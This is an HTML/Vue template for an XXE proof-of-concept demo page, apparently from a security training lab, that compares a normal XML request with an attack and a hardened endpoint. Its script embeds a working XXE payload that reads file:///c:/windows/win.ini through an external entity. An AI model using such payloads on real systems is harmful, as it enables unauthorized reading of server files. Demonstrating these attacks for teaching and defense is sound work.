<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
	<title>XXE</title>
</head>
<body class="oscar-bg">
<div id="app" class="oscar-content rel">
	<div class="oscar-content-inside rel">
		<h1 class="oscar-title fix">
			<img class="l" style="margin-top:7px;" th:src="@{/css/images/logo.png}" height="26px" width="auto" />
			<div class="l">&nbsp;XXE Poc</div>
		</h1>
	</div><!-- oscar-content-inside -->
	<div class="oscar-login-box abs">
		<span id="context" th:value="@{/}" hidden></span>
		<form name="form"  method="POST" onsubmit="return false;">
			<input id="xxe" name="xxe" v-model="xxe" hidden> </input>
			<input id="payload" name="payload" v-model="payload" hidden> </input>
			<input id="def" name="def" v-model="payload" hidden> </input>
			合法请求：<br>
			<button id="loginBtn"  type="button" class="oscar-submit db" @click="login" >提交</button>
			{{xxe}}
			<br> 攻击请求：<br>
			<button id="attackBtn" type="button" class="oscar-submit db" @click="attack" >攻击</button>
			<button id="defBtn" type="button" class="oscar-submit db" @click="def" >防御</button>
			{{payload}}
			{{payload}}
			<br><br>请求结果：<br>
			{{result}}
		</form>
		<!--<span hidden id="error" style="font:bold;color:red" th:text="${#request.getParameter('error')}"/>-->
	</div><!-- /oscar-login-box -->

</div><!-- /oscar-content -->
<footer class="oscar-footer">
	<div class="oscar-line auto"></div><!-- /oscar-line -->
	<br />
</footer>
<script th:src="@{/venders/jquery/jquery.min.2.1.4.js}"></script>
<script th:src="@{/venders/vue.js}"></script>
<script th:src="@{/venders/vue-resource-1.3.4.js}"></script>
<script th:src="@{/lib/base64.js}"></script>
<script th:src="@{/lib/keter-common.js}"></script>
</body>
<script>
	//---- your code begin ----//
            /*用户列表*/
			var userTable = new Vue({
					el : '#app',
					data : {
					    xxe:'<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>'
					   ,payload:'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]><foo>&xxe;</foo>'
					   ,result:''
					},
					created: function () {

				    },
				    methods:{
				       login:function(){
				        var vm = this;
						vm.$http.post('/public/xxe?', xxe.value)
						    .then(function(response){
							console.log(response.bodyText);
							vm.result = response.bodyText;
						}, function(response){
							// 响应错误回调
						});
				       }
				       ,attack:function(){
				        var vm = this;
						vm.$http.post('/public/xxe?', payload.value)
						    .then(function(response){
							console.log(response.bodyText);
							vm.result = response.bodyText;
						}, function(response){
							// 响应错误回调
						});
				       }
				       ,def:function(){
				        var vm = this;
						vm.$http.post('/public/xxesafe?', payload.value)
						    .then(function(response){
							console.log(response.bodyText);
							vm.result = response.bodyText;
						}, function(response){
							// 响应错误回调
							vm.result = response.bodyText;
						});
				       }
				    }
				});

</script>
</html>
